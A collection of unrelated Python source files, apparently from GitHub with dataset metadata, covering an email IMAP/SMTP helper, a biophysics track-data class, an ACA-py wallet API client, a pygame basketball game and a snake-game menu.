tmpdict={ "Date":tmpdate, "From":msg["From"],"To":mail_to , "Subject":msg["Subject"], "ID":str(i), "Attachments":att_count, "EmailSize":msg_size}
msg_to_process[max_iter]=tmpdict #.append(tmpdict)
max_iter-=1
mail.close()
mail.logout()
return msg_to_process,iilist
def is_imap_conn_bad( mail_from, mail_from_pswd, imap_addr):
print('\nVeryfing IMAP credentials...')
try:
# if True:
with imaplib.IMAP4_SSL(imap_addr) as mail:
# mail =
mail.login(mail_from,mail_from_pswd)
mail.select('inbox')
mail.close()
mail.logout()
return False # OK
except:
return True
def is_smtp_conn_bad(smtp_addr,sender_email,password):
print('\nVeryfing SMTP credentials...')
context = ssl.create_default_context()
with smtplib.SMTP_SSL(smtp_addr, 465, context=context) as server:
try:
server.login(sender_email, password)
server.close()
return False
except:
server.close()
return True
| passcombo/walnavi | mylibs/mailbox.py | mailbox.py | py | 19,504 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "socket.setdefaulttimeout",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "mylibs.ioprocessing.print_addr_book",
"line_number": 64,
"usage_type": "call"
},
{
"api_name": "mylibs.ioprocessing",
"line_number": 64,
"usage_type": "name"
},
{
"... |
28567141205 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Base track file data.
"""
from typing import (
Type, Optional, Union, Dict, Tuple, Any, List,
Sequence, Iterable, Iterator, cast, overload
)
from datetime import datetime
from pathlib import Path
from copy import deepcopy, copy
from enum import Enum
import numpy as np
from taskmodel import levelprop, Level, InstrumentType
from taskmodel.level import PHASE
from utils import initdefaults, NoArgs
from .views import Beads, Cycles, isellipsis, TrackView
from .trackio import opentrack, PATHTYPES, instrumentinfo
from .beadstats import (
RawPrecisionCache as _RawPrecisionCache,
beadextension as _beadextension,
phaseposition as _phaseposition,
)
IDTYPE = Union[None, int, range] # missing Ellipsys as mypy won't accept it
PIDTYPE = Union[IDTYPE, slice, Sequence[int]]
DATA = Dict[int, np.ndarray]
BEADS = Dict[int, 'Bead']
DIMENSIONS = Tuple[Tuple[float, float], Tuple[float, float]]
def _doc(tpe: type) -> str:
if tpe.__doc__:
doc = cast(str, tpe.__doc__).strip()
return doc[0].lower()+doc[1:].replace('\n', '\n ')+"\n"
return ''
def _lazies():
return ('_data', '_rawprecisions') + tuple(LazyProperty.LIST)
class Axis(Enum):
"which axis to look at"
Xaxis = 'Xaxis'
Yaxis = 'Yaxis'
Zaxis = 'Zaxis'
@classmethod
def _missing_(cls, name):
if name in 'xyz':
name = name.upper()
if name in 'XYZ':
name += 'axis'
return cls(name)
class Bead:
"""
Characteristics of a bead:
* `position` is the bead's (X, Y, Z) position
* `image` is the bead's calibration image
"""
position: Tuple[float, float, float] = (0., 0., 0.)
image: np.ndarray = np.zeros(0, dtype = np.uint8)
@initdefaults(locals())
def __init__(self, **_):
pass
def thumbnail(self, size, fov):
"extracts a thumbnail around the bead position"
pos = fov.topixel(np.array(list(self.position[:2])))
ind = np.int32(np.round(pos))-size//2 # type: ignore
return fov.image[ind[1]:ind[1]+size,ind[0]:ind[0]+size]
class FoV:
"""
The data concerning the field of view:
* `image` is one image of the field of view
* `dim` are conversion factors from pixel to nm in the format:
"(X slope, X bias), (Y slope, Y bias)".
* `beads` is a dictionnary of information per bead:
"""
if __doc__:
__doc__ += ''.join(f' {i}\n' for i in cast(str, Bead.__doc__).split('\n')[-4:])
image = np.empty((0,0), dtype = np.uint8)
beads: BEADS = {}
dim: DIMENSIONS = ((1., 0.), (1., 0.))
@initdefaults(locals())
def __init__(self, **kwa):
pass
def bounds(self, pixel = False):
"image bounds in nm (*pixel == False*) or pixels"
rng = self.image.shape[1], self.image.shape[0]
return (0, 0) + rng if pixel else self.tonm((0,0)) + self.tonm(rng)
def size(self, pixel = False):
"image size in nm (*pixel == False*) or pixels"
if self.image is None:
xpos = [i.position[0] for i in self.beads.values()]
ypos = [i.position[1] for i in self.beads.values()]
if len(xpos) and len(ypos):
return (max(1., np.nanmax(ypos)-np.nanmin(ypos)),
max(1., np.nanmax(xpos)-np.nanmin(xpos)))
return 1., 1.
rng = self.image.shape[1], self.image.shape[0]
return rng if pixel else self.tonm(rng)
def tonm(self, arr):
"converts pixels to nm"
return self.__convert(arr, self.dim)
def topixel(self, arr):
"converts pixels to nm"
return self.__convert(arr, tuple((1./i, -j/i) for i, j in self.dim))
@property
def scale(self):
"The pixel scale: error occurs if the pixel is not square"
if abs(self.dim[0][0]-self.dim[1][0]) > 1e-6:
raise ValueError("Pixel is not square")
return self.dim[0][0]
@staticmethod
def __convert(arr, dim):
if len(arr) == 0:
return arr
(sl1, int1), (sl2, int2) = dim
if isinstance(arr, np.ndarray):
return [sl1, sl2] * arr + [int1, int2]
if isinstance(arr, tuple) and len(arr) == 2 and np.isscalar(arr[0]):
return tuple(i*k+j for (i, j), k in zip(dim, arr))
tpe = iter if hasattr(arr, '__next__') else type(arr)
return tpe([(sl1*i+int1, sl2*j+int2) for i, j in arr]) # type: ignore
class Secondaries:
"""
Consists in arrays of sparse measures:
* `track.secondaries.tservo` is the servo temperature
* `track.secondaries.tsample` is the sample temperature
* `track.secondaries.tsink` is the heat sink temperature
* `track.secondaries.vcap` is a measure of magnet altitude using voltages
* `track.secondaries.zmag` is a measure of magnet altitude provided by its motor
* `track.secondaries.seconds` is the time axis
"""
def __init__(self, track):
self.__track = track
data = property(lambda self: self.__track._secondaries,
doc = "returns all the data")
tservo = cast(np.ndarray, property(lambda self: self.__value("Tservo"),
doc = "the servo temperature"))
tsample = cast(np.ndarray, property(lambda self: self.__value("Tsample"),
doc = "the sample temperature"))
tsink = cast(np.ndarray, property(lambda self: self.__value("Tsink"),
doc = "the sink temperature"))
vcap = cast(np.ndarray, property(lambda self: self.data.get("vcap"),
doc = "the magnet position: vcap"))
frames = cast(np.ndarray, property(lambda self: self.__track._secondaries["t"],
doc = "the time axis (frame count)"))
seconds = cast(
np.ndarray,
property(
lambda self: (self.__track._secondaries["t"] / self.__track.framerate),
doc = "the time axis (s)"
)
)
zmag = cast(np.ndarray, property(lambda self: self.__track._secondaries["zmag"],
doc = "the magnet altitude sampled at frame rate"))
@property
def cid(self) -> np.ndarray:
"return the cycle per frame"
arr = np.zeros(self.__track.nframes, dtype = 'i4')
for i, j in enumerate(np.split(
arr,
self.__track.phases[:,0]-self.__track.phases[0,0]
)[1:]):
j[:] = i
return arr
@property
def cycleframe(self) -> np.ndarray:
"return the frame-number per cycle, with each cycle starting at 0"
arr = np.zeros(self.__track.nframes, dtype='i4')
for j in np.split(
arr,
self.__track.phases[:, 0]-self.__track.phases[0, 0]
)[1:]:
j[:] = np.arange(len(j))
return arr
@property
def cidcycles(self) -> Cycles:
"return the phases per frame in cycles"
return self.__track.cycles.withdata({"cid": self.cid})
@property
def phase(self) -> np.ndarray:
"return the phases per frame"
arr = np.zeros(self.__track.nframes, dtype = 'i1')
nph = self.__track.nphases
for i, j in enumerate(np.split(
arr,
self.__track.phases.ravel()-self.__track.phases[0,0]
)[1:]):
j[:] = i % nph
return arr
@property
def phasecycles(self) -> Cycles:
"return the phases per frame in cycles"
return self.__track.cycles.withdata({"phase": self.phase})
@property
def zmagcycles(self) -> Cycles:
"the magnet altitude sampled at frame rate"
return self.__track.cycles.withdata({"zmag": self.zmag})
@property
def cycles(self) -> Cycles:
"return zmag, phase and cid per cycle"
return self.__track.cycles.withdata({
i: getattr(self, i) for i in ('cid', 'zmag', 'phase')
})
def keys(self):
"return the available secondaries"
return set(self.data.keys()) | {"tservo", "tsample", "tsink", "vcap", "seconds", "zmag"}
def __getitem__(self, name):
"returns a secondary value"
if hasattr(self, name):
return getattr(self, name)
return self.__value(name) if name.startswith("T") else self.data[name]
def __value(self, name):
val = getattr(self.__track, '_secondaries')
if val is None or name not in val:
return None
arr = np.copy(val[name])
arr['index'] -= self.__track.phases[0,0]
arr = arr[arr['index'] >= 0]
arr = arr[arr['index'] < self.__track.nframes]
return arr
class LazyProperty:
"Checks whether the file was opened prior to returning a value"
LIST: List[str] = []
def __init__(self, name: str = '', tpe: type = None) -> None:
self._name = ''
self._type = tpe
if tpe and getattr(tpe, '__doc__', None):
self.__doc__ = tpe.__doc__
if name:
self._name = '_'+name
self.LIST.append(self._name)
def __set_name__(self, _, name):
self.__init__(name, self._type)
@staticmethod
def _load(inst):
inst.load()
def __get__(self, inst: 'Track', owner):
if inst is not None:
self._load(inst)
return (self._type(inst) if self._type and inst else
getattr(owner if inst is None else inst, self._name))
def __set__(self, obj: 'Track', val):
self._load(obj)
setattr(obj, self._name, val)
return getattr(obj, self._name)
class InstrumentProperty(LazyProperty):
"Checks whether the file was opened prior to returning a value"
def _load(self, inst):
if not inst.isloaded:
info = instrumentinfo(inst)
info['type'] = InstrumentType(info['type'])
setattr(inst, self._name, info)
class ResettingProperty:
"Resets all if this attribute is changed"
def __init__(self):
self._name = ''
def __set_name__(self, _, name):
self._name = '_'+name
def __get__(self, obj: 'Track', _):
return getattr(obj, self._name) if obj else self
def __set__(self, obj: 'Track', val):
setattr(obj, self._name, val)
obj.unload()
return getattr(obj, self._name)
class ViewDescriptor:
"Access to views"
tpe: Optional[type] = None
args: Dict[str, Any] = dict()
def __get__(self, instance, owner):
return self if instance is None else instance.view(self.tpe, **self.args)
def __set_name__(self, _, name):
self.tpe = Cycles if name.startswith('cycles') else Beads
self.args = dict(copy = False)
setattr(self, '__doc__', getattr(self.tpe, '__doc__', None))
class PhaseManipulator:
"""
Helper class for manipulating phases.
"""
def __init__(self, track):
self._track = track
def __getitem__(self, value):
return PHASE[value]
def cut(self, cid:PIDTYPE = None) -> Tuple[np.ndarray, np.ndarray]:
"""
Returns a selection of phases, *reindexed* to zero, with a list of
frame ids corresponding to theses phases.
This can be used to create a track containing a fraction of the original data.
"""
trk = self._track
if isellipsis(cid):
cycs = slice(None, None)
if isinstance(cid, (slice, range)):
cycs = slice(0 if cid.start is None else cid.start,
len(trk.phases) if cid.stop is None else cid.stop,
1 if cid.step is None else cid.step)
else:
cycs = np.array(cid, dtype = 'i4')
phases = trk.phases[cycs]
first = phases[:,0]
if isinstance(cycs, slice):
last = trk.phases[cycs.start+1:cycs.stop+1:cycs.step,0] # type: ignore
else:
tmp = cycs+1
last = trk.phases[tmp[tmp < len(trk.phases)],0]
if len(last) < len(first):
last = np.append(last, trk.nframes+trk.phases[0,0])
inds = np.concatenate([np.arange(j, dtype = 'i4')+i for i, j in zip(first, last-first)])
inds -= self._track.phases[0, 0]
phases = (np.insert(np.cumsum(np.diff(np.hstack([phases, last[:,None]]))), 0, 0)
[:-1].reshape((-1, phases.shape[1])))
return inds, phases
def duration(self, cid:PIDTYPE = None, pid:IDTYPE = None) -> Union[np.ndarray, int]:
"""
Returns the duration of a phase per cycle.
"""
if isinstance(pid, (tuple, list, np.ndarray)):
return np.vstack([self.__duration(cid, i) for i in cast(list, pid)]).T
return self.__duration(cid, pid)
def select(self, cid:PIDTYPE = None, pid:PIDTYPE = None) -> Union[np.ndarray, int]:
"""
Returns the start time of the cycle and phase.
If pid >= nphases, the end time of cycles is returned.
if pid is a sequence of ints, a table is returned.
"""
if isinstance(pid, (tuple, list, np.ndarray)):
return np.vstack([self.__select(cid, i) for i in cast(list, pid)]).T
return self.__select(cid, pid)
nframes = cast(int, property(lambda self: self._track.nframes))
ncycles = cast(int, property(lambda self: self._track.ncycles))
nphases = cast(int, property(lambda self: self._track.nphases))
if __doc__:
__doc__ += " * `cut`: " + cast(str, cut.__doc__) .strip()+"\n"
__doc__ += " * `duration`: " + cast(str, duration.__doc__).strip()+"\n"
__doc__ += " * `select`: " + cast(str, select.__doc__) .strip()+"\n"
def __duration(self, cid:PIDTYPE = None, pid:IDTYPE = None) -> Union[np.ndarray, int]:
phases = self._track.phases
if isinstance(pid, str):
pid = self[pid]
if isinstance(pid, int):
pid = range(pid, cast(int, None if pid == -1 else pid+1))
elif isellipsis(pid):
pid = range(phases.shape[1])
elif isinstance(pid, (slice, range)):
pid = range(
None if pid.start is None else self[pid.start],
None if pid.stop is None else self[pid.stop]
)
else:
raise TypeError()
start = 0 if pid.start is None else pid.start
if pid.stop == start:
return np.zeros(len(phases), dtype = 'i4')[cid]
return self.select(cid, pid.stop) - self.select(cid, pid.start)
def __select(self, cid:PIDTYPE = None, pid:PIDTYPE = None) -> Union[np.ndarray, int]:
phases = self._track.phases
ells = isellipsis(cid), isellipsis(pid)
if not ells[1]:
pid = self[pid]
if np.isscalar(pid) and pid >= self._track.nphases:
if np.isscalar(cid):
return (self._track.nframes if cid >= self._track.ncycles-1 else
phases[1+cast(int, cid),0]-phases[0,0])
tmp = np.append(phases[1:,0]-phases[0,0], np.int32(self._track.nframes))
return tmp[None if ells[0] else cid]
return (phases if all(ells) else
phases[:,pid] if ells[0] else
phases[cid,:] if ells[1] else
phases[cid,pid]) - phases[0,0]
class PathInfo:
"""
Provides information on the path itself:
* `paths`: a tuple of paths
* `trackpath`: the main path, i.e. not the grs
* `size` (*megabytes*) is the size in bytes (megabytes) of *trackpath*
* `stat`: stats on the *trackpath*
* `modification`: the date oflast modification. This is basically the
time of experiment.
* `creation`: the creation date. **DISCARD** when using PicoTwist tracks.
"""
track: 'Track'
def __get__(self, inst, tpe):
if inst is None:
return self
cpy = PathInfo()
cpy.track = inst
return cpy
@property
def paths(self) -> List[Path]:
"returns all paths"
path = self.track.path
return (
[Path(path)] if isinstance(path, str) else
[path] if isinstance(path, Path) else
[] if path is None else
[Path(str(i)) for i in cast(Iterable, path)]
)
@property
def trackpath(self) -> Path:
"returns all paths"
path = self.track.path
return Path(str(path[0])) if isinstance(path, (list, tuple)) else Path(str(path))
pathcount = property(lambda self: len(self.paths))
stat = property(lambda self: self.trackpath.stat())
size = property(lambda self: self.stat.st_size)
megabytes = property(lambda self: self.size >> 20)
creation = property(lambda self: datetime.fromtimestamp(self.stat.st_ctime))
@property
def modification(self):
"return the modification date of the **original** track file."
date = getattr(self.track, '_modificationdate', None)
if date is None and self.trackpath.exists():
date = self.stat.st_mtime
else:
date = 0
return datetime.fromtimestamp(date)
@levelprop(Level.project)
class Track:
"""
The data from a track file, accessed lazily (only upon request).
The data can be read as:
```python
>>> raw = Track(path = "/path/to/a/file.trk")
>>> grs = Track(path = ("/path/to/a/file.trk",
... "/path/to/a/gr/directory",
... "/path/to/a/specific/gr"))
```
The data can then be accessed as follows:
* for the *time* axis: `raw.beads['t']`
* for the magnet altitude: `raw.beads['zmag']`
* specific beads: `raw.beads[0]` where 0 can be any bead number
* specific cycles: `raw.cycles[1,5]` where 1 and 5 can be any bead or cycle number.
Some slicing is possible:
* `raw.cycles[:,range(5,10)]` accesses cycles 5 though 10 for all beads.
* `raw.cycles[[2,5],...]` accesses all cycles for beads 5 and 5.
Only data for the Z axis is available. Use the `axis = 'X'` or `axis = 'Y'`
options in the constructor to access other data.
Other attributes are:
* `framerate` is this experiment's frame rate
* `phases` is a 2D array with one row per cycle and one column per phase
containing the first index value of each cycle and phase.
* `path` is the path(s) to the data
* `axis` (Є {{'X', 'Y', 'Z'}}) is the data axis
* `ncycles` is the number of cycles
* `nphases` is the number of phases
* `secondaries` {secondaries}
* `fov` {fov}
* `pathinfo` {pathinfo}
"""
if __doc__:
__doc__ = __doc__.format(
secondaries = _doc(Secondaries),
fov = _doc(FoV),
pathinfo = _doc(PathInfo)
)
key: Optional[str] = None
instrument = cast(Dict[str, Any], InstrumentProperty())
phases = cast(np.ndarray, LazyProperty())
framerate = cast(float, LazyProperty())
fov = cast(FoV, LazyProperty())
secondaries = cast(Secondaries, LazyProperty(tpe = Secondaries))
path = cast(Optional[PATHTYPES], ResettingProperty())
axis = cast(Axis, ResettingProperty())
data = cast(
DATA,
property(lambda self: self.getdata(), lambda self, val: self.setdata(val))
)
@initdefaults('key',
**{i: '_' for i in locals() if i != 'key' and i[0] != '_'})
def __init__(self, **kwa):
self._rawprecisions: _RawPrecisionCache = _RawPrecisionCache()
if 'rawprecisions' in kwa and isinstance(kwa['rawprecisions'], _RawPrecisionCache):
self._rawprecisions = kwa['rawprecisions']
elif 'rawprecisions' in kwa:
self._rawprecisions.computer = kwa['rawprecisions']
ncycles = cast(int, property(lambda self: len(self.phases)))
nphases = cast(int, property(lambda self: self.phases.shape[1]))
beads = cast(Beads, ViewDescriptor())
cycles = cast(Cycles, ViewDescriptor())
phase = property(PhaseManipulator, doc = PhaseManipulator.__doc__)
pathinfo = PathInfo()
def getdata(self) -> DATA:
"returns the dataframe with all bead info"
self.load()
return cast(DATA, self._data)
def setdata(self, data: Optional[Dict[int, np.ndarray]]):
"sets the dataframe"
if data is None:
self.unload()
else:
self._data = data
@property
def nframes(self) -> int:
"returns the number of frames"
return len(next(iter(self.data.values()), []))
@property
def isloaded(self) -> bool:
"returns whether the data was already acccessed"
return self._data is not None
def load(self, cycles: Optional[slice] = None) -> 'Track':
"Loads the data"
if self._data is None and self._path is not None:
opentrack(self, cycles)
return self
def unload(self):
"Unloads the data"
for name in _lazies():
setattr(self, name, deepcopy(getattr(type(self), name)))
def view(self, tpe:Union[Type[TrackView], str], **kwa):
"Creates a view of the suggested type"
viewtype = (tpe if isinstance(tpe, type) else
Cycles if tpe.lower() == 'cycles' else
Beads)
kwa.setdefault('parents', (self.key,) if self.key else (self.path,))
kwa.setdefault('track', self)
return viewtype(**kwa)
@overload # noqa: F811
def rawprecision(
self,
ibead: int,
phases: Union[None, Dict[int, float], Tuple[int, int]],
):
"Obtain the raw precision for a given bead"
@overload # noqa: F811
def rawprecision(self, computertype: str) -> None:
"Set the raw precision computer"
@overload # noqa: F811
def rawprecision(self) -> str:
"Obtain the raw precision computer"
@overload # noqa: F811
def rawprecision(
self,
ibead: Optional[Iterable[int]],
phases: Union[None, Dict[int, float], Tuple[int, int]],
) -> Iterator[Tuple[int,float]]:
"Obtain the raw precision for a number of beads"
def rawprecision(self, ibead = NoArgs, phases = None): # noqa: F811
"Obtain the raw precision for a number of beads"
if ibead is NoArgs:
return self._rawprecisions.computer
if isinstance(ibead, (type, str)):
self._rawprecisions.computer = ibead
return None
return self._rawprecisions.get(self, ibead, phases)
if __doc__ is not None:
setattr(rawprecision, '__doc__', getattr(_RawPrecisionCache.get, '__doc__', None))
beadextension = _beadextension
phaseposition = _phaseposition
def shallowcopy(self):
"make a shallow copy of the track: different containers but for the true data"
cpy = self.__class__()
cpy.__dict__.update({i: copy(j) for i, j in self.__dict__.items()})
return cpy
def __getstate__(self):
keys = set(_lazies()+('_path', '_axis'))
test = dict.fromkeys(keys, lambda i, j: j != getattr(type(self), i)) # type: ignore
test.update(_phases = lambda _, i: len(i),
key = lambda _, i: i is not None)
cnv = dict.fromkeys(keys | {'key'}, lambda i: i) # type: ignore
cnv.update(_secondaries = lambda i: getattr(i, 'data', None),
_axis = lambda i: getattr(i, 'value', i)[0])
info = self.__dict__.copy()
if self._lazydata_:
for i in ('_data', '_secondaries', '_fov'):
info.pop(i, None)
for name in set(cnv) & set(info):
val = info.pop(name)
if test[name](name, val):
info[name[1:] if name[0] == '_' else name] = cnv[name](val)
return info
def __setstate__(self, values):
if isinstance(values.get('fov', None), dict):
fov = values['fov']
fov["beads"] = {i: Bead(**j) for i, j in fov.get('beads', {}).items()}
values['fov'] = FoV(**fov)
if isinstance(values.get('instrument', {}).get("type", None), str):
values['instrument']['type'] = InstrumentType(values['instrument']['type'])
self.__init__(**values)
keys = frozenset(self.__getstate__().keys()) | frozenset(('data', 'secondaries'))
self.__dict__.update({i: j for i, j in values.items() if i not in keys})
@property
def _lazydata_(self):
"""
Used internally to discard the data from __getstate__, or not
"""
return self.__dict__.get('_lazydata_', self.path is not None)
@_lazydata_.setter
def _lazydata_(self, val):
if val is None:
self.__dict__.pop('_lazydata_', None)
else:
self.__dict__['_lazydata_'] = val
_framerate: float = 30.
_fov: Optional[FoV] = None
_instrument: Dict[str, Any] = {
"type": InstrumentType.picotwist.name,
"name": None
}
_phases: np.ndarray = np.empty((0,9), dtype = 'i4')
_data: Optional[DATA] = None # type: ignore
_secondaries: Optional[DATA] = None
_rawprecisions: _RawPrecisionCache = _RawPrecisionCache()
_path: Optional[PATHTYPES] = None
_axis: Axis = Axis.Zaxis
| depixusgenome/trackanalysis | src/data/track.py | track.py | py | 26,097 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "typing.Union",
"line_number": 27,
"usage_type": "name"
},
{
"api_name": "typing.Union",
"line_number": 28,
"usage_type": "name"
},
{
"api_name": "typing.Sequence",
"line_number": 28,
"usage_type": "name"
},
{
"api_name": "typing.Dict",
"line_num... |
22290768472 | from typing import Any, Dict, Optional
import httpx
from ...client import Client
from ...models.wallet_module_response import WalletModuleResponse
from ...types import UNSET, Response
def _get_kwargs(
*,
client: Client,
did: str,
) -> Dict[str, Any]:
url = "{}/wallet/did/local/rotate-keypair".format(client.base_url)
headers: Dict[str, str] = client.get_headers()
cookies: Dict[str, Any] = client.get_cookies()
params: Dict[str, Any] = {}
params["did"] = did
params = {k: v for k, v in params.items() if v is not UNSET and v is not None}
return {
"method": "patch",
"url": url,
"headers": headers,
"cookies": cookies,
"timeout": client.get_timeout(),
"params": params,
}
def _parse_response(*, response: httpx.Response) -> Optional[WalletModuleResponse]:
if response.status_code == 200:
response_200 = WalletModuleResponse.from_dict(response.json())
return response_200
return None
def _build_response(*, response: httpx.Response) -> Response[WalletModuleResponse]:
return Response(
status_code=response.status_code,
content=response.content,
headers=response.headers,
parsed=_parse_response(response=response),
)
def sync_detailed(
*,
client: Client,
did: str,
) -> Response[WalletModuleResponse]:
"""Rotate keypair for a DID not posted to the ledger
Args:
did (str):
Returns:
Response[WalletModuleResponse]
"""
kwargs = _get_kwargs(
client=client,
did=did,
)
response = httpx.request(
verify=client.verify_ssl,
**kwargs,
)
return _build_response(response=response)
def sync(
*,
client: Client,
did: str,
) -> Optional[WalletModuleResponse]:
"""Rotate keypair for a DID not posted to the ledger
Args:
did (str):
Returns:
Response[WalletModuleResponse]
"""
return sync_detailed(
client=client,
did=did,
).parsed
async def asyncio_detailed(
*,
client: Client,
did: str,
) -> Response[WalletModuleResponse]:
"""Rotate keypair for a DID not posted to the ledger
Args:
did (str):
Returns:
Response[WalletModuleResponse]
"""
kwargs = _get_kwargs(
client=client,
did=did,
)
async with httpx.AsyncClient(verify=client.verify_ssl) as _client:
response = await _client.request(**kwargs)
return _build_response(response=response)
async def asyncio(
*,
client: Client,
did: str,
) -> Optional[WalletModuleResponse]:
"""Rotate keypair for a DID not posted to the ledger
Args:
did (str):
Returns:
Response[WalletModuleResponse]
"""
return (
await asyncio_detailed(
client=client,
did=did,
)
).parsed
| Indicio-tech/acapy-client | acapy_client/api/wallet/patch_wallet_did_local_rotate_keypair.py | patch_wallet_did_local_rotate_keypair.py | py | 2,921 | python | en | code | 6 | github-code | 1 | [
{
"api_name": "client.Client",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "client.base_url",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "typing.Dict",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "client.get_headers",
... |
71795305634 | import pygame
from random import randint
pygame.init()
#game window
WIDTH = 600
HEIGHT = 400
win = pygame.display.set_mode((WIDTH, HEIGHT))
pygame.display.set_caption("Shot Clock")
pygame.display.set_icon(pygame.image.load('icon.png'))
#gmae font
pygame.font.init()
GAME_FONT = pygame.font.Font('gamera.TTF', 35)
#game start and timing variables
game_start = False # boolean that controls main loop
start_time = 0 # Start time for game timer
TIME_ALLOWED = 60 # amount of time player has (1 minute)
#ball properties
MAX_BALL_SPEED = 17
MIN_BALL_SPEED = 4
#game colors
BLACK = (0, 0, 0)
ORANGE = (252, 102, 0)
WHITE = (255, 255, 255)
#sprites
HOOP = pygame.image.load('hoop.png')
BASKETBALL = pygame.image.load('ball.png')
class Ball:
def __init__(self,x, y,vel):
self.x = x
self.y = y
self.vel = vel
def draw_ball(self, surface):
surface.blit(BASKETBALL,(self.x, self.y))
def update_position(self):
self.y += self.vel
def is_off_screen(self):
return self.y > 420
# game start loop
def start_game():
global game_start
global start_time
line1 = GAME_FONT.render("Make Shots! You Have 60s!!", True, ORANGE)
line2 = GAME_FONT.render("Press SPACE To Start!!", True, ORANGE)
line3 = GAME_FONT.render("ESC to Exit R to Reset", True, ORANGE)
line4 = GAME_FONT.render("A:Left D:Right", True, ORANGE)
win.blit(line1, (50, 50))
win.blit(line2, (80, 130))
win.blit(line3, (80, 210))
win.blit(line4, (150, 290))
pygame.display.update()
while not game_start:
if game_start:
break
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
exit()
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_SPACE:
game_start = True
start_time = pygame.time.get_ticks()
if event.key == pygame.K_ESCAPE:
pygame.quit()
exit()
def is_time_left():
return TIME_ALLOWED > int((pygame.time.get_ticks() - start_time) / 1000)
game_balls = [
Ball(randint(30, 570), 0, randint(1, MAX_BALL_SPEED)),
Ball(randint(30, 570), 0, randint(1, MAX_BALL_SPEED)),
Ball(randint(30, 570), 0, randint(1, MAX_BALL_SPEED)),
Ball(randint(30, 570), 0, randint(1, MAX_BALL_SPEED))
]
def new_ball(index):
global MAX_BALL_SPEED
global MIN_BALL_SPEED
game_balls[index].x = randint(30, 570)
game_balls[index].y = 0
game_balls[index].vel = randint(MIN_BALL_SPEED, MAX_BALL_SPEED)
if MIN_BALL_SPEED < MAX_BALL_SPEED:
MIN_BALL_SPEED += 1
def main():
global game_start
global start_time
hoop_x = 260
hoop_y = 360
hitbox_x = 280
hitbox_y = 380
clock = pygame.time.Clock()
SCORE = 0 # player score
start_game()
if not game_start:
print("\nYou Didn't Press Space :( ")
else:
print("\nGame starting....")
while game_start and is_time_left():
TIME_LEFT = TIME_ALLOWED - int((pygame.time.get_ticks() - start_time) / 1000)
clock.tick(30)
for event in pygame.event.get():
if event.type == pygame.QUIT:
game_start = False
keys = pygame.key.get_pressed()
# if press left(A):
# move the basket to left (-1 to y value)
if keys[pygame.K_a]:
hoop_x -= 40
hitbox_x -= 40
# after moving the platform. if its x or y match those of the platform
# they have collided/touched (the ball is caught) add one
# if press right(D):
# move the basket to the right(+1 to y value)
if keys[pygame.K_d]:
hoop_x += 30
hitbox_x += 30
# if press escape(ESC)
# quit game
if keys[pygame.K_ESCAPE]:
print("Exiting Game......")
game_start = False
# if press reset(R)
# resets timer to 60s
if keys[pygame.K_r]:
start_time = pygame.time.get_ticks()
SCORE = 0
win.fill((0, 0, 0))
# basket/hoop
win.blit(HOOP, (hoop_x,hoop_y))
# balls
# Loop the same (4) balls with a new speed and position each time they come back.
# ball is looped after it registers as a point or falls off screen
for i in range(4):
if game_balls[i].is_off_screen():
new_ball(i)
game_balls[i].draw_ball(win)
game_balls[i].update_position()
# if any part of the hoop/platform is touched by a ball as a collision
# ball is cleared from the display and new ball appears
if (hitbox_y) < game_balls[i].y < (hitbox_y + 20) and (hitbox_x) < \
game_balls[i].x < (hoop_x + 120):
# hitbox is simplified to be 120x20 rectangle starting from the top left corner of the rim
# if a ball falls within this region it is considered a score.
SCORE += 1
new_ball(i)
# prints time on screen
time_tracker = GAME_FONT.render(F"Time:{TIME_LEFT}", True, ORANGE)
win.blit(time_tracker, (455, 0))
# prints score on screen
score_tracker = GAME_FONT.render(F"Score:{SCORE}", True, ORANGE)
win.blit(score_tracker, (0, 0))
pygame.display.update()
# End Game Loop
# End screen lasts for 10 secs and exits automatically
close_window = False
while not close_window:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
exit()
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
close_window = True
if event.key == pygame.K_r:
win.fill(BLACK)
main()
win.fill(BLACK)
game_over = GAME_FONT.render("Game Over!", True, ORANGE)
win.blit(game_over, (215, 50))
final_score = GAME_FONT.render(F"Final Score: {SCORE} ", True, WHITE)
win.blit(final_score, (185, 130))
new_game = GAME_FONT.render("Press R to Start New Game", True, ORANGE)
win.blit(new_game, (50,210))
exit_game = GAME_FONT.render("Press ESC to Close Game", True, ORANGE)
win.blit(exit_game, (70, 290))
pygame.display.update()
# gg
pygame.quit()
if __name__ == "__main__":
main() | BaboyaChoch/Shot-Clock | main.py | main.py | py | 6,568 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "pygame.init",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "pygame.display.set_mode",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "pygame.display",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "pygame.display.s... |
18279946367 | #SNAKE MENU
import pygame
import time
ANSI_HOME_CURSOR = u"\u001B[0;0H\u001B[2"
RESET_COLOR = u"\u001B[0m\u001B[2D"
def snake_print(position):
snake = [" ____", " / . .\ ", " \ ---<", " _________________/ /", " \__________________/"]
print(ANSI_HOME_CURSOR)
print(RESET_COLOR)
sp = " " * position
for line in snake:
print("\033[1;33;93m" + sp + line)
print(RESET_COLOR)
def snake():
start = 0
end = 50
step = 2
for position in range(start, end, step):
snake_print(position)
time.sleep(0.3)
#main menu
def main():
snake()
print(" ")
print("SNAKE REMAKE!")
print(" ")
print("1: Tutorial")
print("2: Play")
print("0: Exit")
try:
answer = int(input("SELECT A NUMBER: "))
if answer >= 4:
print("INVALID NUMBER:", answer)
return
while answer < 4:
if answer == 1:
print("Tutorial: Control the snake using your arrow keys. Eat the fruit, and avoid moving off the screen or bumping into yourself. Get the as many fruits as you can!")
answer = int(input("SELECT A NUMBER TO CONTINUE: "))
elif answer == 2:
print(" ")
print("E: Easy")
print("M: Medium")
print("H: Hard")
leveltype = input("SELECT A LEVEL: ")
setlevel(leveltype)
return
elif answer == 0:
return
else:
print("INVALID NUMBER: {answer}")
return
except ValueError:
print("NOT A NUMBER")
